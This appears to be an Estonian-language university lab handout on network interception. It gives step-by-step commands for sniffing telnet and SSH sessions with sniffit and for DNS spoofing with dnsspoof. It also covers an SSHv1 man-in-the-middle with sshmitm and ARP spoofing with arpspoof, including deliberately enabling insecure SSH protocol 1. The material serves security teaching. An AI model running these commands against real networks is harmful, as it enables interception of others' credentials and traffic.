apt-get install telnetd sniffit tcpdump wireshark dsniffKontrollige, kas teil on olemas fail /etc/ssh/ssh_host_key ning kui ei ole, laske uus SSHv1 võti genereerida:
ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_keyKontrollige, et failis /etc/ssh/sshd_config oleks read
Protocol 2,1 HostKey /etc/ssh/ssh_host_keyning kui ei ole, redigeerige seda faili ning muutke Protocol-rida sobivaks ja lisage HostKey rida ning kui muutsite, siis andke ka käsk
/etc/init.d/ssh restartSellega konfigureerite SSH serveri ka protokolli versiooni 1 toetama (sest meie pealtkuulamisprogramm oskab ainult SSH v1 kuulata).
ip addr lsTeie IP-aadress on väljundis inet real enne /24 maski, 192.168.10.*
mkdir sniffit cd sniffit sniffit -s meiemasinaIP(või siseneva suuna logimiseks:)
sniffit -t meiemasinaIP
telnet 192.168.10.YAndke mõned käsud, et need ära tunneksite, ja logige välja (exit).
ssh test@192.168.10.YAndke samuti mõned käsud ja logige välja.
sshmitm -I B-IP-aadress
192.168.10.E praksXX.test.mt.ut.eekäivitab dnsspoofi:
/usr/sbin/dnsspoof -f hosts.dnsspoof udp port 53Seejärel proovib teises aknas logida ssh'ga masinasse B (tõenäoliselt kaevatakse hosti võtme muutumise üle, lugege veateadet ning kustutage vajadusel fail .ssh/knwn_hosts, et teatest vabaneda)
ssh -1 test@praksXX.test.mt.ut.ee
echo "1" > /proc/sys/net/ipv4/ip_forward echo "0" > /proc/sys/net/ipv4/conf/eth0/rp_filter echo "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects
arpspoof 192.168.10.Bja samaaegselt veel lisaks
tcpdump -e host 192.168.10.B
praks07.test.mt.ut.ee (192.168.10.107) at 00:AA:BB:CC:DD:07 [ether] on eth0 praks08.test.mt.ut.ee (192.168.10.108) at 00:AA:BB:CC:DD:08 [ether] on eth0 praks09.test.mt.ut.ee (192.168.10.109) at 00:AA:BB:CC:DD:09 [ether] on eth0
sniffit -t 192.168.10.Y
rm -rf /root/sniffit /root/hosts.dnsspoof